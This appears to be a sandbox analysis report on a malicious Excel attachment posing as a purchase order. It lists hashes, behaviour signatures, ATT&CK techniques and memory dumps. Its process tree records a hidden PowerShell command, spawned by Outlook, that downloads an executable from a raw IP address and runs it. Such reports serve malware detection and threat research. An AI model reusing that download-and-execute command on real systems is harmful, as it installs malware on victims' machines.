Overview

overview

8

Static

static

8

PO_723_057_35.xls

windows7_x64

8

PO_723_057_35.xls

windows10_x64

1

Resubmissions

15-04-2021 14:52

210415-yq44wm2vx6 8

15-04-2021 14:46

210415-pceqx9e4ts 8

Analysis

  • max time kernel
    151s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    15-04-2021 14:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO_723_057_35.xls

  • Size

    342KB

  • MD5

    f264b8c58febaa3f3eea9a8c83c78cbf

  • SHA1

    36010881f4c3e15878bb3d5e76bc443d82827ebe

  • SHA256

    db66b26d04c77e03bbf22957af34ba2b5817c397036ab8d4b7c222ec1b1ff40e

  • SHA512

    a60be6e617f2704c3dfdc7bcc06e2426f5c52e56da447c92c94e1ce3d118c27b0ef180845557abf3c1d6a63de4f85b93c11eac06bb7bc51c17934406c797f912

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO_723_057_35.xls
    1⤵
    • Deletes itself
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1784
  • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
    1⤵
    • Drops file in System32 directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -w Hidden Invoke-WebRequest -Uri "http://178.17.171.144/sch/Scafu.exe" -OutFile "C:\Users\Public\Documents\okMr.exe";C:\Users\Public\Documents\okMr.exe
      2⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1564
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:1952
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1860
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" C:\vcredist2010_x64.log.html
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:876
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:876 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:592
    • C:\Program Files\VideoLAN\VLC\vlc.exe
      "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\EnableUnlock.m4a"
      1⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:1712

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/592-109-0x0000000000000000-mapping.dmp
      Download
    • memory/1564-72-0x0000000002690000-0x0000000002691000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-65-0x0000000000000000-mapping.dmp
      Download
    • memory/1564-80-0x0000000005830000-0x0000000005831000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-66-0x00000000754F1000-0x00000000754F3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1564-67-0x0000000000940000-0x0000000000941000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-68-0x0000000004C00000-0x0000000004C01000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-70-0x0000000004BC2000-0x0000000004BC3000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-69-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-81-0x00000000065F0000-0x00000000065F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-75-0x00000000057E0000-0x00000000057E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-106-0x0000000006590000-0x0000000006591000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-105-0x0000000006580000-0x0000000006581000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-71-0x0000000000E50000-0x0000000000E51000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-82-0x000000007EF20000-0x000000007EF21000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-89-0x00000000059B0000-0x00000000059B1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-90-0x0000000006680000-0x0000000006681000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1564-91-0x0000000005A40000-0x0000000005A41000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1784-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1784-61-0x0000000070F81000-0x0000000070F83000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1784-107-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1784-60-0x000000002F531000-0x000000002F534000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1952-108-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp
      Filesize

      8KB

      Download